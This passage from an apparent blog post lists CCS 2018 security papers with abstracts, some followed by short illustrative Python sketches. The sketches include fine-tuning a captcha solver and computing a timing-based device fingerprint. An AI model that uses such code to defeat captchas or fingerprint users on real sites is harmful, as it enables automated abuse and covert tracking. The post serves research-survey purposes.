Papers in (Broadly) Web-Related Directions from the Four Top System Security Conferences Since 2018 (Updated Through October 2020)

CCS 2020 has not taken place yet; I will update this post once it has. Since the post is already very long, it only covers papers up to 2020 for now; later years will be tracked in a separate post.

|      | CCS | S&P | USENIX Security | NDSS |
|------|-----|-----|-----------------|------|
| 2018 | Proceedings dblp | program dblp | Technical Sessions dblp | Programme dblp |
| 2019 | Proceedings dblp | program dblp | Technical Sessions dblp | Programme dblp |
| 2020 | Nov. 9-13, 2020, Orlando, USA | program dblp | Technical Sessions dblp | Programme dblp |

The scope is not strictly Web: besides Web papers, I also include papers from other directions I am interested in, such as ML.

Some papers carry markers: ✔ means I have read it, 👍 means I think it is good, 👎 means I think it is not. If a paper is marked as read but has no rating, it usually means I either could not follow it or found it unremarkable. (And often I am simply too lazy to add a marker even after reading.)

【⚠ This post is very long ⚠】The current count is 120,097 words. Use the table of contents, and make good use of CTRL+F.

CCS

One gripe: CCS has grown too large, with more accepted papers every year.

2018 Proceedings dblp

Session 2D: ML 1

Yet Another Text Captcha Solver: A Generative Adversarial Network Based Approach

Although several attacks have been proposed, text-based CAPTCHAs are still being widely used as a security mechanism. One of the reasons for the pervasive use of text captchas is that many of the prior attacks are scheme-specific and require a labor-intensive and time-consuming process to construct. This means that a change in the captcha security features, like a noisier background, can simply invalidate an earlier attack. This paper presents a generic, yet effective text captcha solver based on the generative adversarial network. Unlike prior machine-learning-based approaches that need a large volume of manually-labeled real captchas to learn an effective solver, our approach requires significantly fewer real captchas but yields much better performance. This is achieved by first learning a captcha synthesizer to automatically generate synthetic captchas to learn a base solver, and then fine-tuning the base solver on a small set of real captchas using transfer learning. We evaluate our approach by applying it to 33 captcha schemes, including 11 schemes that are currently being used by 32 of the top-50 popular websites including Microsoft, Wikipedia, eBay and Google. Our approach is the most capable attack on text captchas seen to date. It outperforms four state-of-the-art text-captcha solvers by not only delivering a significantly higher accuracy on all testing schemes, but also successfully attacking schemes where others have zero chance. We show that our approach is highly efficient as it can solve a captcha within 0.05 seconds using a desktop GPU. We demonstrate that our attack is generally applicable because it can bypass the advanced security features employed by most modern text captcha schemes. We hope the results of our work can encourage the community to revisit the design and practical use of text captchas.
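
The second stage described above, fine-tuning a solver that was pre-trained on synthetic captchas using a small set of real ones, is standard transfer learning. Below is a minimal PyTorch sketch of that step; the `classifier` module name and all hyperparameters are hypothetical, not taken from the paper's implementation.

```python
# Hypothetical sketch of the fine-tuning stage: freeze the generic
# convolutional features learned on synthetic captchas and update only
# the classifier head on a few hundred labeled real captchas.
import torch
import torch.nn as nn

def fine_tune(base_solver: nn.Module, real_loader, epochs: int = 5):
    # Early layers capture generic stroke/texture features that transfer
    # well across schemes, so only the head (assumed here to be named
    # "classifier") is left trainable.
    for name, param in base_solver.named_parameters():
        param.requires_grad = name.startswith("classifier")

    optimizer = torch.optim.Adam(
        (p for p in base_solver.parameters() if p.requires_grad), lr=1e-4)
    loss_fn = nn.CrossEntropyLoss()

    for _ in range(epochs):
        for images, labels in real_loader:
            optimizer.zero_grad()
            loss = loss_fn(base_solver(images), labels)
            loss.backward()
            optimizer.step()
    return base_solver
```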

Model-Reuse Attacks on Deep Learning Systems

Many of today’s machine learning (ML) systems are built by reusing an array of, often pre-trained, primitive models, each fulfilling distinct functionality (e.g., feature extraction). The increasing use of primitive models significantly simplifies and expedites the development cycles of ML systems. Yet, because most of such models are contributed and maintained by untrusted sources, their lack of standardization or regulation entails profound security implications, about which little is known thus far. In this paper, we demonstrate that malicious primitive models pose immense threats to the security of ML systems. We present a broad class of model-reuse attacks wherein maliciously crafted models trigger host ML systems to misbehave on targeted inputs in a highly predictable manner. By empirically studying four deep learning systems (including both individual and ensemble systems) used in skin cancer screening, speech recognition, face verification, and autonomous steering, we show that such attacks are (i) effective - the host systems misbehave on the targeted inputs as desired by the adversary with high probability, (ii) evasive - the malicious models function indistinguishably from their benign counterparts on non-targeted inputs, (iii) elastic - the malicious models remain effective regardless of various system design choices and tuning strategies, and (iv) easy - the adversary needs little prior knowledge about the data used for system tuning or inference. We provide analytical justification for the effectiveness of model-reuse attacks, which points to the unprecedented complexity of today’s primitive models. This issue thus seems fundamental to many ML systems. We further discuss potential countermeasures and their challenges, which lead to several promising research directions.

LEMNA: Explaining Deep Learning based Security Applications

While deep learning has shown great potential in various domains, the lack of transparency has limited its application in security or safety-critical areas. Existing research has attempted to develop explanation techniques to provide interpretable explanations for each classification decision. Unfortunately, current methods are optimized for non-security tasks (e.g., image analysis). Their key assumptions are often violated in security applications, leading to a poor explanation fidelity. In this paper, we propose LEMNA, a high-fidelity explanation method dedicated to security applications. Given an input data sample, LEMNA generates a small set of interpretable features to explain how the input sample is classified. The core idea is to approximate a local area of the complex deep learning decision boundary using a simple interpretable model. The local interpretable model is specially designed to (1) handle feature dependency to better work with security applications (e.g., binary code analysis); and (2) handle nonlinear local boundaries to boost explanation fidelity. We evaluate our system using two popular deep learning applications in security (a malware classifier, and a function start detector for binary reverse-engineering). Extensive evaluations show that LEMNA's explanation has a much higher fidelity level compared to existing methods. In addition, we demonstrate practical use cases of LEMNA to help machine learning developers validate model behavior, troubleshoot classification errors, and automatically patch the errors of the target models.
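
The core idea, fitting a simple interpretable model to the classifier's behavior in a small neighborhood of one input, can be sketched in a few lines. LEMNA's actual surrogate is a fused-lasso mixture-regression model that handles feature dependency; the plain Lasso below is a deliberate simplification to convey the idea, and all names are illustrative.

```python
# Toy local-surrogate explanation: perturb the input, record the model's
# responses nearby, and fit a sparse linear model whose largest
# coefficients mark the features driving the decision.
import numpy as np
from sklearn.linear_model import Lasso

def explain_locally(predict_fn, x, n_samples=2000, noise=0.1, top_k=10):
    # predict_fn maps a batch of inputs to the probability of the class
    # being explained (an assumed interface, not LEMNA's API).
    X = x + noise * np.random.randn(n_samples, x.shape[0])
    y = predict_fn(X)
    surrogate = Lasso(alpha=0.01).fit(X, y)
    return np.argsort(-np.abs(surrogate.coef_))[:top_k]
```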

Effective Program Debloating via Reinforcement Learning

Prevalent software engineering practices such as code reuse and the “one-size-fits-all” methodology have contributed to significant and widespread increases in the size and complexity of software. The resulting software bloat has led to decreased performance and increased security vulnerabilities. We propose a system called Chisel to enable programmers to effectively customize and debloat programs. Chisel takes as input a program to be debloated and a high-level specification of its desired functionality. The output is a reduced version of the program that is correct with respect to the specification. Chisel significantly improves upon existing program reduction systems by using a novel reinforcement learning-based approach to accelerate the search for the reduced program and scale to large programs. Our evaluation on a suite of 10 widely used UNIX utility programs each comprising 13-90 KLOC of C source code demonstrates that Chisel is able to successfully remove all unwanted functionalities and reduce attack surfaces. Compared to two state-of-the-art program reducers C-Reduce and Perses, which time out on 6 programs and 2 programs respectively in 12 hours, Chisel runs up to 7.1x and 3.7x faster and finishes on all programs.

Session 3D: ML 2

Tiresias: Predicting Security Events Through Deep Learning

With the increased complexity of modern computer attacks, there is a need for defenders not only to detect malicious activity as it happens, but also to predict the specific steps that will be taken by an adversary when performing an attack. However, this is still an open research problem, and previous research in predicting malicious events only looked at binary outcomes (e.g., whether an attack would happen or not), but not at the specific steps that an attacker would undertake. To fill this gap we present Tiresias, a system that leverages Recurrent Neural Networks (RNNs) to predict future events on a machine, based on previous observations. We test Tiresias on a dataset of 3.4 billion security events collected from a commercial intrusion prevention system, and show that our approach is effective in predicting the next event that will occur on a machine with a precision of up to 0.93. We also show that the models learned by Tiresias are reasonably stable over time, and provide a mechanism that can identify sudden drops in precision and trigger a retraining of the system. Finally, we show that the long-term memory typical of RNNs is key in performing event prediction, rendering simpler methods not up to the task.
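
As a rough illustration of the architecture class used here, a next-event predictor over categorical security-event IDs can be built as an embedding layer, an LSTM, and a softmax head. This is not the paper's exact model; all sizes and names below are invented.

```python
# Minimal next-event predictor in the spirit of Tiresias: given a sequence
# of past event IDs, output logits over the next event.
import torch
import torch.nn as nn

class NextEventModel(nn.Module):
    def __init__(self, n_events: int, emb: int = 64, hidden: int = 128):
        super().__init__()
        self.embed = nn.Embedding(n_events, emb)
        self.lstm = nn.LSTM(emb, hidden, batch_first=True)
        self.head = nn.Linear(hidden, n_events)

    def forward(self, event_ids):          # (batch, seq_len) integer IDs
        h, _ = self.lstm(self.embed(event_ids))
        return self.head(h[:, -1, :])      # logits for the next event

# Train with cross-entropy on (prefix, next_event) pairs; at inference,
# the argmax of the logits is the predicted next step of the attack.
```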

DeepMem: Learning Graph Neural Network Models for Fast and Robust Memory Forensic Analysis

Kernel data structure detection is an important task in memory forensics that aims at identifying semantically important kernel data structures from raw memory dumps. It is primarily used to collect evidence of malicious or criminal behaviors. Existing approaches have several limitations: 1) list-traversal approaches are vulnerable to DKOM attacks, 2) robust signature-based approaches are not scalable or efficient, because they need to search the entire memory snapshot for one kind of object using one signature, and 3) both list-traversal and signature-based approaches heavily rely on domain knowledge of the operating system. Based on these limitations, we propose DeepMem, a graph-based deep learning approach to automatically generate abstract representations for kernel objects, with which we could recognize the objects from raw memory dumps in a fast and robust way. Specifically, we implement 1) a novel memory graph model that reconstructs the content and topology information of memory dumps, 2) a graph neural network architecture to embed the nodes in the memory graph, and 3) an object detection method that cross-validates the evidence collected from different parts of objects. Experiments show that DeepMem achieves high precision and recall rate in identifying kernel objects from raw memory dumps. Also, the detection strategy is fast and scalable by using the intermediate memory graph representation. Moreover, DeepMem is robust against attack scenarios, like pool tag manipulation and DKOM process hiding.

Property Inference Attacks on Fully Connected Neural Networks using Permutation Invariant Representations

With the growing adoption of machine learning, sharing of learned models is becoming popular. However, in addition to the prediction properties the model producer aims to share, there is also a risk that the model consumer can infer other properties of the training data the model producer did not intend to share. In this paper, we focus on the inference of global properties of the training data, such as the environment in which the data was produced, or the fraction of the data that comes from a certain class, as applied to white-box Fully Connected Neural Networks (FCNNs). Because of their complexity and inscrutability, FCNNs have a particularly high risk of leaking unexpected information about their training sets; at the same time, this complexity makes extracting this information challenging. We develop techniques that reduce this complexity by noting that FCNNs are invariant under permutation of nodes in each layer. We develop our techniques using representations that capture this invariance and simplify the information extraction task. We evaluate our techniques on several synthetic and standard benchmark datasets and show that they are very effective at inferring various data properties. We also perform two case studies to demonstrate the impact of our attack. In the first case study we show that a classifier that recognizes smiling faces also leaks information about the relative attractiveness of the individuals in its training set. In the second case study we show that a classifier that recognizes Bitcoin mining from performance counters also leaks information about whether the classifier was trained on logs from machines that were patched for the Meltdown and Spectre attacks.
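
The permutation invariance that the attack's representations capture is easy to verify concretely: permuting the hidden units of one layer, together with the matching columns of the next layer's weight matrix, changes the parameter vector but not the function. A small NumPy check with invented layer sizes:

```python
# Permuting hidden units (rows of W1/b1 and the matching columns of W2)
# leaves an FCNN's output unchanged, so any attack feature must be
# invariant under this permutation.
import numpy as np

rng = np.random.default_rng(0)
W1, b1 = rng.normal(size=(16, 8)), rng.normal(size=16)   # layer 1: 8 -> 16
W2, b2 = rng.normal(size=(3, 16)), rng.normal(size=3)    # layer 2: 16 -> 3

def forward(x, W1, b1, W2, b2):
    h = np.maximum(0, W1 @ x + b1)        # ReLU hidden layer
    return W2 @ h + b2

perm = rng.permutation(16)
x = rng.normal(size=8)
assert np.allclose(forward(x, W1, b1, W2, b2),
                   forward(x, W1[perm], b1[perm], W2[:, perm], b2))
```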

Machine Learning with Membership Privacy using Adversarial Regularization

Machine learning models leak a significant amount of information about their training sets through their predictions. This is a serious privacy concern for the users of machine learning as a service. To address this concern, in this paper, we focus on mitigating the risks of black-box inference attacks against machine learning models. We introduce a mechanism to train models with membership privacy, which ensures indistinguishability between the predictions of a model on its training data and other data points (from the same distribution). This requires minimizing the accuracy of the best black-box membership inference attack against the model. We formalize this as a min-max game, and design an adversarial training algorithm that minimizes the prediction loss of the model as well as the maximum gain of the inference attacks. This strategy, which can guarantee membership privacy (as prediction indistinguishability), also acts as a strong regularizer and helps the model generalize. We evaluate the practical feasibility of our privacy mechanism on training deep neural networks using benchmark datasets. We show that the min-max strategy can mitigate the risks of membership inference attacks (near random guess), and can achieve this with a negligible drop in the model’s prediction accuracy (less than 4%).

Session 6D: Usable Security

Asking for a Friend: Evaluating Response Biases in Security User Studies

The security field relies on user studies, often including survey questions, to query end users’ general security behavior and experiences, or hypothetical responses to new messages or tools. Self-report data has many benefits – ease of collection, control, and depth of understanding – but also many well-known biases stemming from people’s difficulty remembering prior events or predicting how they might behave, as well as their tendency to shape their answers to a perceived audience. Prior work in fields like public health has focused on measuring these biases and developing effective mitigations; however, there is limited evidence as to whether and how these biases and mitigations apply specifically in a computer-security context. In this work, we systematically compare real-world measurement data to survey results, focusing on an exemplar, well-studied security behavior: software updating. We align field measurements about specific software updates (n=517,932) with survey results in which participants respond to the update messages that were used when those versions were released (n=2,092). This allows us to examine differences in self-reported and observed update speeds, as well as examining self-reported responses to particular message features that may correlate with these results. The results indicate that for the most part, self-reported data varies consistently and systematically with measured data. However, this systematic relationship breaks down when survey respondents are required to notice and act on minor details of experimental manipulations. Our results suggest that many insights from self-report security data can, when used with care, translate to real-world environments; however, insights about specific variations in message texts or other details may be more difficult to assess with surveys.

Towards Usable Checksums: Automating the Integrity Verification of Web Downloads for the Masses

Internet users can download software for their computers from app stores (e.g., Mac App Store and Windows Store) or from other sources, such as the developers’ websites. Most Internet users in the US rely on the latter, according to our representative study, which makes them directly responsible for the content they download. To enable users to detect if the downloaded files have been corrupted, developers can publish a checksum together with the link to the program file; users can then manually verify that the checksum matches the one they obtain from the downloaded file. In this paper, we assess the prevalence of such behavior among the general Internet population in the US (N=2,000), and we develop easy-to-use tools for users and developers to automate both the process of checksum verification and generation. Specifically, we propose an extension to the recent W3C specification for sub-resource integrity in order to provide integrity protection for download links. Also, we develop an extension for the popular Chrome browser that computes and verifies checksums of downloaded files automatically, and an extension for the WordPress CMS that developers can use to easily attach checksums to their remote content. Our in situ experiments with 40 participants demonstrate the usability and effectiveness issues of manual checksum verification, and show that users find our browser extension desirable.
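
At its core, what the proposed browser extension automates is hashing the downloaded file and comparing the digest against the one the developer published. A minimal sketch, assuming SRI-style `sha256-<base64>` checksum strings; the helper name is hypothetical.

```python
# Verify a downloaded file against a published SRI-style checksum,
# e.g. "sha256-R7Fx...". Hashes in chunks so large downloads are fine.
import base64
import hashlib

def verify_download(path: str, published: str) -> bool:
    algo, _, expected = published.partition("-")
    h = hashlib.new(algo)                  # e.g. hashlib.new("sha256")
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return base64.b64encode(h.digest()).decode() == expected
```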

Investigating System Operators’ Perspective on Security Misconfigurations

Nowadays, security incidents have become a familiar “nuisance,” and they regularly lead to the exposure of private and sensitive data. The root causes for such incidents are rarely complex attacks. Instead, they are enabled by simple misconfigurations, such as authentication not being required, or security updates not being installed. For example, the leak of over 140 million Americans’ private data from Equifax’s systems is among the most severe misconfigurations in recent history: The underlying vulnerability was long known, and a security patch had been available for months, but was never applied. Ultimately, Equifax blamed an employee for forgetting to update the affected system, highlighting his personal responsibility. In this paper, we investigate the operators’ perspective on security misconfigurations to approach the human component of this class of security issues. We focus our analysis on system operators, who have not received significant attention from prior research. Hence, we investigate their perspective with an inductive approach and apply a multi-step empirical methodology: (i) a qualitative study to understand how to approach the target group and measure the misconfiguration phenomenon, and (ii) a quantitative survey rooted in the qualitative data. We then provide the first analysis of system operators’ perspective on security misconfigurations, and we determine the factors that operators perceive as the root causes. Based on our findings, we provide practical recommendations on how to reduce the frequency and impact of security misconfigurations.

Peeling the Onion’s User Experience Layer: Examining Naturalistic Use of the Tor Browser

The strength of an anonymity system depends on the number of users. Therefore, the User eXperience (UX) and usability of these systems are of critical importance for boosting adoption and use. To this end, we carried out a study with 19 non-expert participants to investigate how users experience routine Web browsing via the Tor Browser, focusing particularly on encountered problems and frustrations. Using a mixed-methods quantitative and qualitative approach to study one week of naturalistic use of the Tor Browser, we uncovered a variety of UX issues, such as broken Web sites, latency, lack of common browsing conveniences, differential treatment of Tor traffic, incorrect geolocation, and operational opacity. We applied this insight to suggest a number of UX improvements that could mitigate the issues and reduce user frustration when using the Tor Browser.

Session 7C: TLS

Pseudo Constant Time Implementations of TLS Are Only Pseudo Secure

Today, about 10% of TLS connections are still using CBC-mode cipher suites, despite a long history of attacks and the availability of better options (e.g. AES-GCM). In this work, we present three new types of attack against four popular fully patched implementations of TLS (Amazon’s s2n, GnuTLS, mbed TLS and wolfSSL) which elected to use “pseudo constant time” countermeasures against the Lucky 13 attack on CBC-mode. Our attacks combine several variants of the PRIME+PROBE cache timing technique with a new extension of the original Lucky 13 attack. They apply in a cross-VM attack setting and are capable of recovering most of the plaintext whilst requiring only a moderate number of TLS connections. Along the way, we uncovered additional serious (but easy to patch) bugs in all four of the TLS implementations that we studied; in three cases, these bugs lead to Lucky 13 style attacks that can be mounted remotely with no access to a shared cache. Our work shows that adopting pseudo constant time countermeasures is not sufficient to attain real security in TLS implementations in CBC mode.
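
For context on the countermeasure class at issue: a MAC or padding check whose running time depends on secret data leaks information through timing, and the textbook fix is a fully constant-time comparison. The paper's point is that approximate ("pseudo constant time") versions still leak through the cache; the Python sketch below only contrasts a naive early-exit comparison with the stdlib constant-time one to illustrate the baseline principle, not the paper's attacks.

```python
# The early-exit comparison returns sooner the earlier a mismatch occurs,
# which leaks how many leading bytes of a forged MAC were correct.
import hmac

def leaky_equal(a: bytes, b: bytes) -> bool:
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:                 # secret-dependent early exit
            return False
    return True

def constant_time_equal(a: bytes, b: bytes) -> bool:
    # Runtime does not depend on where (or whether) the inputs differ.
    return hmac.compare_digest(a, b)
```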

Partially Specified Channels: The TLS 1.3 Record Layer without Elision

We advance the study of secure stream-based channels (Fischlin et al., CRYPTO ‘15) by considering the multiplexing of many data streams over a single channel, an essential feature of real world protocols such as TLS. Our treatment adopts the definitional perspective of Rogaway and Stegers (CSF ‘09), which offers an elegant way to reason about what standardizing documents actually provide: a partial specification of a protocol that admits a collection of compliant, fully realized implementations. We formalize partially specified channels as the component algorithms of two parties communicating over a channel. Each algorithm has an oracle that provides specification details; the algorithms abstract the things that must be explicitly specified, while the oracle abstracts the things that need not be. Our security notions, which capture a variety of privacy and integrity goals, allow the adversary to respond to these oracle queries; security relative to these notions implies that the channel withstands attacks in the presence of worst-case (i.e., adversarial) realizations of the specification details. We apply this framework to a formal treatment of the TLS 1.3 record layer and, in doing so, show that its security hinges crucially upon details left unspecified by the standard.

The Multi-user Security of GCM, Revisited: Tight Bounds for Nonce Randomization

Multi-user (mu) security considers large-scale attackers (e.g., state actors) that given access to a number of sessions, attempt to compromise at least one of them. Mu security of authenticated encryption (AE) was explicitly considered in the development of TLS 1.3. This paper revisits the mu security of GCM, which remains to date the most widely used dedicated AE mode. We provide new concrete security bounds which improve upon previous work by adopting a refined parameterization of adversarial resources that highlights the impact on security of (1) nonce re-use across users and of (2) re-keying. As one of the main applications, we give tight security bounds for the nonce-randomization mechanism adopted in the record protocol of TLS 1.3 as a mitigation of large-scale multi-user attacks. We provide tight security bounds that yield the first validation of this method. In particular, we solve the main open question of Bellare and Tackmann (CRYPTO ‘16), who only considered restricted attackers which do not attempt to violate integrity, and only gave non-tight bounds.
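
The nonce-randomization mechanism under analysis is simple to state: per RFC 8446, Section 5.3, TLS 1.3 forms each record's AEAD nonce by left-padding the 64-bit record sequence number to the IV length and XORing it with a per-connection random IV. A direct sketch:

```python
# TLS 1.3 per-record nonce derivation (RFC 8446, Section 5.3): the random
# per-connection write IV masks the predictable sequence number, so two
# connections essentially never share a (key, nonce) pair.
import os

def tls13_per_record_nonce(write_iv: bytes, seq_num: int) -> bytes:
    padded_seq = seq_num.to_bytes(len(write_iv), "big")
    return bytes(iv ^ s for iv, s in zip(write_iv, padded_seq))

write_iv = os.urandom(12)   # in TLS this IV is derived from the handshake
record0 = tls13_per_record_nonce(write_iv, 0)
record1 = tls13_per_record_nonce(write_iv, 1)
assert record0 != record1   # nonces differ per record, unpredictably placed
```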

Session 8A: Web Security 1

Predicting Impending Exposure to Malicious Content from User Behavior

Many computer-security defenses are reactive—they operate only when security incidents take place, or immediately thereafter. Recent efforts have attempted to predict security incidents before they occur, to enable defenders to proactively protect their devices and networks. These efforts have primarily focused on long-term predictions. We propose a system that enables proactive defenses at the level of a single browsing session. By observing user behavior, it can predict whether they will be exposed to malicious content on the web seconds before the moment of exposure, thus opening a window of opportunity for proactive defenses. We evaluate our system using three months’ worth of HTTP traffic generated by 20,645 users of a large cellular provider in 2017 and show that it can be helpful, even when only very low false positive rates are acceptable, and despite the difficulty of making “on-the-fly” predictions. We also engage directly with the users through surveys asking them demographic and security-related questions, to evaluate the utility of self-reported data for predicting exposure to malicious content. We find that self-reported data can help forecast exposure risk over long periods of time. However, even in the long term, self-reported data is not as crucial as behavioral measurements to accurately predict exposure.

Clock Around the Clock: Time-Based Device Fingerprinting

Physical device fingerprinting exploits hardware features to uniquely identify a machine. This technique has been used for authentication, license binding, or attacker identification, among other tasks. More recently, hardware features have also been introduced to identify web users and perform web tracking. A particular type of hardware fingerprint exploits differences in the computer internal clock signals. However, previous methods to test for these differences relied on complex experiments performed by running native code in the target machine. In this paper, we show a new way to compute a hardware fingerprint, based on timing the execution of sequences of instructions readily available in API functions. Due to its simplicity, this method can also be performed remotely by simply timing a few seemingly innocuous lines of JavaScript code. We tested our approach with different functions, such as common string manipulation or widespread cryptographic routines, and found that several of them can be used as basic blocks for fingerprinting. Using this technique, we implemented a tool called CryptoFP. We tested its native implementation in a homogeneous scenario, to distinguish among a perfectly identical (both in software and hardware) set of computers. CryptoFP was able to correctly discriminate all the identical computers in this scenario and recognize the same computer also under different CPU load configurations, outperforming every other hardware fingerprinting method. We then show how CryptoFP can be implemented using a combination of the HTML5 Cryptography API and standard timing API for web device fingerprinting. In this case, we compared our method, both in the same homogeneous scenario and by performing an experiment with real-world users running heterogeneous devices, against other state-of-the-art web device fingerprinting solutions. In both cases, our approach clearly outperforms all existing methods.
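
The timing idea can be transplanted into a few lines of Python for intuition: repeatedly time a fixed cryptographic routine and keep the shape of the timing distribution, not its mean, as the signature. The real attack times JavaScript API calls in the browser; everything below is only an illustration with invented parameters.

```python
# Build a crude timing histogram of a fixed SHA-256 workload; machines
# with different clock/CPU behavior produce differently shaped histograms.
import hashlib
import time

def timing_fingerprint(rounds: int = 2000, bins: int = 20):
    payload = b"\x00" * 4096
    samples = []
    for _ in range(rounds):
        t0 = time.perf_counter_ns()
        hashlib.sha256(payload).digest()
        samples.append(time.perf_counter_ns() - t0)
    lo, hi = min(samples), max(samples)
    width = max(1, (hi - lo) // bins)
    hist = [0] * (bins + 1)
    for s in samples:
        hist[min((s - lo) // width, bins)] += 1
    return hist   # the distribution shape, not the mean, is the signature
```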

The Web’s Sixth Sense: A Study of Scripts Accessing Smartphone Sensors

We present the first large-scale measurement of smartphone sensor API usage and stateless tracking on the mobile web. We extend the OpenWPM web privacy measurement tool to develop OpenWPM-Mobile, adding the ability to emulate plausible sensor values for different smartphone sensors such as motion, orientation, proximity and light. Using OpenWPM-Mobile we find that one or more sensor APIs are accessed on 3,695 of the top 100K websites by scripts originating from 603 distinct domains. We also detect fingerprinting attempts on mobile platforms, using techniques previously applied in the desktop setting. We find significant overlap between fingerprinting scripts and scripts accessing sensor data. For example, 63% of the scripts that access motion sensors also engage in browser fingerprinting. To better understand the real-world uses of sensor APIs, we cluster JavaScript programs that access device sensors and then perform automated code comparison and manual analysis. We find a significant disparity between the actual and intended use cases of device sensors as drafted by the W3C. While some scripts access sensor data to enhance user experience, such as orientation detection and gesture recognition, tracking and analytics are the most common use cases among the scripts we analyzed. We automated the detection of sensor data exfiltration and observed that the raw readings are frequently sent to remote servers for further analysis. Finally, we evaluate available countermeasures against the misuse of sensor APIs. We find that popular tracking protection lists such as EasyList and Disconnect commonly fail to block most tracking scripts that misuse sensors. Studying nine popular mobile browsers we find that even privacy-focused browsers, such as Brave and Firefox Focus, fail to implement mitigations suggested by the W3C, which include limiting sensor access from insecure contexts and cross-origin iframes. We have reported these issues to the browser vendors.

Session 8B: Usable Passwords

Reinforcing System-Assigned Passphrases Through Implicit Learning

People tend to choose short and predictable passwords that are vulnerable to guessing attacks. Passphrases are passwords consisting of multiple words, initially introduced as more secure authentication keys that people could recall. Unfortunately, people tend to choose predictable natural language patterns in passphrases, again resulting in vulnerability to guessing attacks. One solution could be system-assigned passphrases, but people have difficulty recalling them. With the goal of improving the usability of system-assigned passphrases, we propose a new approach of reinforcing system-assigned passphrases using implicit learning techniques. We design and test a system that implements this approach using two implicit learning techniques: contextual cueing and semantic priming. In a 780-participant online study, we explored the usability of 4-word system-assigned passphrases using our system compared to a set of control conditions. Our study showed that our system significantly improves usability of system-assigned passphrases, both in terms of recall rates and login time.

“What was that site doing with my Facebook password?”: Designing Password-Reuse Notifications

Password reuse is widespread, so a breach of one provider’s password database threatens accounts on other providers. When companies find stolen credentials on the black market and notice potential password reuse, they may require a password reset and send affected users a notification. Through two user studies, we provide insight into such notifications. In Study 1, 180 respondents saw one of six representative notifications used by companies in situations potentially involving password reuse. Respondents answered questions about their reactions and understanding of the situation. Notifications differed in the concern they elicited and intended actions they inspired. Concerningly, less than a third of respondents reported intentions to change any passwords. In Study 2, 588 respondents saw one of 15 variations on a model notification synthesizing results from Study 1. While the variations’ impact differed in small ways, respondents’ intended actions across all notifications would leave them vulnerable to future password-reuse attacks. We discuss best practices for password-reuse notifications and how notifications alone appear insufficient in solving password reuse.

On the Accuracy of Password Strength Meters

Password strength meters are an important tool to help users choose secure passwords. Strength meters can only provide reasonable guidance when they are accurate, i.e., when their scores correctly reflect password strength. A strength meter with low accuracy may do more harm than good and guide the user to choose passwords with a high score but low actual security. While a substantial number of different strength meters have been proposed in the literature and deployed in practice, we are lacking a clear picture of which strength meters provide high accuracy, and thus are most helpful for guiding users. Furthermore, we lack a clear understanding of how to compare accuracies of strength meters. In this work, (i) we propose a set of properties that a strength meter needs to fulfill to be considered to have high accuracy, (ii) we use these properties to select a suitable measure that can determine the accuracy of strength meters, and (iii) we use the selected measure to compare a wide range of strength meters proposed in the academic literature, provided by password managers, operating systems, and those used on websites. We expect our work to be helpful in the selection of good password strength meters by service operators, and to aid the further development of improved strength meters.
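
One natural family of accuracy measures compares the meter's ordering of passwords with the order in which a guessing attacker would crack them. The sketch below uses plain Kendall's tau as a stand-in; the paper motivates and selects a more suitable (weighted) rank measure, so treat this only as the shape of the computation.

```python
# Rank-correlate meter scores with attacker guess numbers: an accurate
# meter assigns higher scores to passwords that need more guesses.
from scipy.stats import kendalltau

def meter_accuracy(meter_scores, guess_numbers):
    tau, _ = kendalltau(meter_scores, guess_numbers)
    return tau                     # 1.0 = perfect agreement in ordering

# Toy example: the meter's ordering matches attacker difficulty exactly.
print(meter_accuracy([0.1, 0.5, 0.9], [1e2, 1e6, 1e12]))   # 1.0
```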

Session 9A: Web Security 2

Mystique: Uncovering Information Leakage from Browser Extensions

Browser extensions are small JavaScript, CSS and HTML programs that run inside the browser with special privileges. These programs, often written by third parties, operate on the pages that the browser is visiting, giving the user a programmatic way to configure the browser. The privacy implications that arise by allowing privileged third-party code to execute inside the users’ browser are not well understood. In this paper, we develop a taint analysis framework for browser extensions and use it to perform a large scale study of extensions in regard to their privacy practices. We first present a hybrid approach to traditional taint analysis: by leveraging the fact that extension source code is available to the runtime JavaScript engine, we implement as well as enhance traditional taint analysis using information gathered from static data flow and control-flow analysis of the JavaScript source code. Based on this, we further modify the Chromium browser to support taint tracking for extensions. We analyzed 178,893 extensions crawled from the Chrome Web Store between September 2016 and March 2018, as well as a separate set of all available extensions (2,790 in total) for the Opera browser at the time of analysis. From these, our analysis flagged 3,868 (2.13%) extensions as potentially leaking privacy-sensitive information. The top 10 most popular Chrome extensions that we confirmed to be leaking privacy-sensitive information have more than 60 million users combined. We ran the analysis on a local Kubernetes cluster and were able to finish within a month, demonstrating the feasibility of our approach for large-scale analysis of browser extensions. At the same time, our results emphasize the threat browser extensions pose to user privacy, and the need for countermeasures to safeguard against misbehaving extensions that abuse their privileges.

How You Get Shot in the Back: A Systematical Study about Cryptojacking in the Real World

As a new mechanism to monetize web content, cryptocurrency mining is becoming increasingly popular. The idea is simple: a webpage delivers extra workload (JavaScript) that consumes computational resources on the client machine to solve cryptographic puzzles, typically without notifying users or having explicit user consent. This new mechanism, often heavily abused and thus considered a threat termed “cryptojacking”, is estimated to affect over 10 million web users every month; however, only a few anecdotal reports exist so far and little is known about its severity, infrastructure, and technical characteristics behind the scene. This is likely due to the lack of effective approaches to detect cryptojacking at a large-scale (e.g., VirusTotal). In this paper, we take a first step towards an in-depth study over cryptojacking. By leveraging a set of inherent characteristics of cryptojacking scripts, we build CMTracker, a behavior-based detector with two runtime profilers for automatically tracking Cryptocurrency Mining scripts and their related domains. Surprisingly, our approach successfully discovered 2,770 unique cryptojacking samples from 853,936 popular web pages, including 868 among the top 100K in the Alexa list. Leveraging these samples, we gain a more comprehensive picture of the cryptojacking attacks, including their impact, distribution mechanisms, obfuscation, and attempts to evade detection. For instance, a diverse set of organizations benefit from cryptojacking based on the unique wallet ids. In addition, to stay under the radar, they frequently update their attack domains (fastflux) on the order of days. Many attackers also apply evasion techniques, including limiting the CPU usage, obfuscating the code, etc.

MineSweeper: An In-depth Look into Drive-by Cryptocurrency Mining and Its Defense

